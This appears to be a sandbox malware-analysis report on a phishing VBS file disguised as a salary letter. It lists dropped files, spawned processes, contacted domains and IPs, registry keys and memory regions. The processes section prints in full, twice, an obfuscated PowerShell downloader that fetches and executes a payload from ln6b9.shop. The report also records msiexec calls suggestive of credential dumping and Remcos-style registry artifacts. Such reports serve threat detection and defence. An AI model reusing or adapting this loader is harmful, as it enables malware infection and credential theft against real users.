Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Salary Increase Letter_Oct 2024.vbs
|
ASCII text, with very long lines (2232), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
|
Unknown
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jgfagqx.hls.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_by2ssk52.nr3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0vvkzsf.0yf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xik3ehvu.jax.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvF097.tmp
|
Extensible storage user DataBase, version 0x620, checksum 0x8672f832, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Lokumernes.sus
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis
#>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If
($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes;
for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function
Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas
r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s
m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT
doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable
'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb
r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded
(Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+
co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT
xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded
(Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri:
KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY
FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable
' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM
lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo
ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg
iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD
Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko
';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH
le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste)
{Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la
') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable
' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH
Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin
rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E
lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB
slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar
');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr
s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s
iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie
Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im
G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg
MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio.
prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je
Bu)he ');Unmudded $dissimilerende;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis
#>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If
($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes;
for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function
Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas
r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s
m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT
doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable
'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb
r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded
(Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+
co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT
xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded
(Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri:
KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY
FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable
' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM
lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo
ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg
iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD
Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko
';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH
le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste)
{Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la
') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable
' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH
Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin
rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E
lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB
slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar
');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr
s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s
iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie
Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im
G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg
MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio.
prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je
Bu)he ');Unmudded $dissimilerende;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
154.216.17.14
|
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://geoplugin.net/json.gpy2
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.binK
|
unknown
|
||
|
http://geoplugin.net/json.gp1
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
http://geoplugin.net/json.gpxes
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://ln6b9.shop/IBodHWPw/Kokkerering.ocx
|
104.21.2.6
|
||
|
https://www.google.com
|
unknown
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
|
unknown
|
||
|
http://ln6b9.shop/IBodHWPw/Kokkerering.ocxXR
|
unknown
|
||
|
http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bins
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://geoplugin.net/json.gpI
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gpf
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.imvu.compData
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://geoplugin.net/json.gphy
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin
|
104.21.2.6
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
http://ln6b9.shop
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin0JdY
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 39 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
geoplugin.net
|
178.237.33.50
|
||
|
ln6b9.shop
|
104.21.2.6
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
154.216.17.14
|
unknown
|
Seychelles
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
104.21.2.6
|
ln6b9.shop
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
552C000
|
trusted library allocation
|
page read and write
|
|
|
|
6A36000
|
heap
|
page read and write
|
|
|
|
9345000
|
direct allocation
|
page execute and read and write
|
|
|
|
6A1D000
|
heap
|
page read and write
|
|
|
|
80C0000
|
direct allocation
|
page execute and read and write
|
|
|
|
1ACF561F000
|
trusted library allocation
|
page read and write
|
|
|
|
69DA000
|
heap
|
page read and write
|
|
|
|
4F19000
|
heap
|
page read and write
|
||
|
2040E52D000
|
heap
|
page read and write
|
||
|
22448000
|
heap
|
page read and write
|
||
|
5513000
|
trusted library allocation
|
page read and write
|
||
|
4790000
|
heap
|
page read and write
|
||
|
1ACE5634000
|
trusted library allocation
|
page read and write
|
||
|
4F24000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
7040000
|
trusted library allocation
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
3FF0000
|
trusted library allocation
|
page read and write
|
||
|
6AE0000
|
heap
|
page read and write
|
||
|
2040E436000
|
heap
|
page read and write
|
||
|
21F3F000
|
stack
|
page read and write
|
||
|
6949EFF000
|
stack
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
|
261F000
|
stack
|
page read and write
|
||
|
2040E476000
|
heap
|
page read and write
|
||
|
4190000
|
trusted library allocation
|
page read and write
|
||
|
4010000
|
trusted library allocation
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
204101A6000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
1ACFDF80000
|
heap
|
page read and write
|
||
|
226CB000
|
heap
|
page read and write
|
||
|
2040E479000
|
heap
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
6949BFE000
|
stack
|
page read and write
|
||
|
17F10FF000
|
stack
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
6949AFE000
|
stack
|
page read and write
|
||
|
204101B3000
|
heap
|
page read and write
|
||
|
7CB5000
|
trusted library allocation
|
page read and write
|
||
|
1ACF55D1000
|
trusted library allocation
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
226CB000
|
heap
|
page read and write
|
||
|
7E48000
|
heap
|
page read and write
|
||
|
2040E45A000
|
heap
|
page read and write
|
||
|
2040E43A000
|
heap
|
page read and write
|
||
|
2040E3FD000
|
heap
|
page read and write
|
||
|
2227E000
|
stack
|
page read and write
|
||
|
6A4E000
|
stack
|
page read and write
|
||
|
625000
|
stack
|
page read and write
|
||
|
2620000
|
heap
|
page read and write
|
||
|
7FFD344E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
43C5000
|
remote allocation
|
page execute and read and write
|
||
|
690B000
|
stack
|
page read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
307B000
|
heap
|
page read and write
|
||
|
7E7A000
|
heap
|
page read and write
|
||
|
5526000
|
trusted library allocation
|
page read and write
|
||
|
2681000
|
heap
|
page read and write
|
||
|
8130000
|
direct allocation
|
page read and write
|
||
|
68C0000
|
direct allocation
|
page read and write
|
||
|
2040E43C000
|
heap
|
page read and write
|
||
|
6949FFF000
|
stack
|
page read and write
|
||
|
67A0000
|
direct allocation
|
page read and write
|
||
|
6C92000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
4822000
|
heap
|
page read and write
|
||
|
6A54000
|
heap
|
page read and write
|
||
|
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
|
1ACFDA59000
|
heap
|
page read and write
|
||
|
17F248B000
|
stack
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
4F25000
|
heap
|
page read and write
|
||
|
1ACF5899000
|
trusted library allocation
|
page read and write
|
||
|
68CD000
|
stack
|
page read and write
|
||
|
2A68000
|
heap
|
page read and write
|
||
|
247D000
|
stack
|
page read and write
|
||
|
2040E45B000
|
heap
|
page read and write
|
||
|
4F1E000
|
heap
|
page read and write
|
||
|
20410345000
|
heap
|
page read and write
|
||
|
223D0000
|
heap
|
page read and write
|
||
|
3FC0000
|
trusted library allocation
|
page read and write
|
||
|
204101C4000
|
heap
|
page read and write
|
||
|
29A6000
|
stack
|
page read and write
|
||
|
2203D000
|
stack
|
page read and write
|
||
|
1ACE60FE000
|
trusted library allocation
|
page read and write
|
||
|
1ACE3BD0000
|
trusted library allocation
|
page read and write
|
||
|
22448000
|
heap
|
page read and write
|
||
|
204101A1000
|
heap
|
page read and write
|
||
|
694A3FC000
|
stack
|
page read and write
|
||
|
1ACE3C50000
|
heap
|
page read and write
|
||
|
6A61000
|
heap
|
page read and write
|
||
|
22336000
|
direct allocation
|
page execute and read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
2040E407000
|
heap
|
page read and write
|
||
|
1ACFDAC7000
|
heap
|
page read and write
|
||
|
47C8000
|
heap
|
page read and write
|
||
|
1ACE54E0000
|
heap
|
page execute and read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
1ACFDAF0000
|
heap
|
page read and write
|
||
|
224C2000
|
heap
|
page read and write
|
||
|
47C5000
|
heap
|
page read and write
|
||
|
8150000
|
direct allocation
|
page read and write
|
||
|
2040E41F000
|
heap
|
page read and write
|
||
|
806E000
|
stack
|
page read and write
|
||
|
6BD0000
|
direct allocation
|
page read and write
|
||
|
225DA000
|
heap
|
page read and write
|
||
|
22560000
|
heap
|
page read and write
|
||
|
6CDF000
|
heap
|
page read and write
|
||
|
2040E425000
|
heap
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
|
223D1000
|
heap
|
page read and write
|
||
|
47DA000
|
heap
|
page read and write
|
||
|
4F19000
|
heap
|
page read and write
|
||
|
2040E44D000
|
heap
|
page read and write
|
||
|
40C0000
|
heap
|
page readonly
|
||
|
226FB000
|
heap
|
page read and write
|
||
|
68D0000
|
heap
|
page read and write
|
||
|
6860000
|
heap
|
page readonly
|
||
|
1ACE5C95000
|
trusted library allocation
|
page read and write
|
||
|
4F18000
|
heap
|
page read and write
|
||
|
1ACE3A70000
|
heap
|
page read and write
|
||
|
1ACE60F7000
|
trusted library allocation
|
page read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
2230B000
|
unclassified section
|
page execute and read and write
|
||
|
47EE000
|
heap
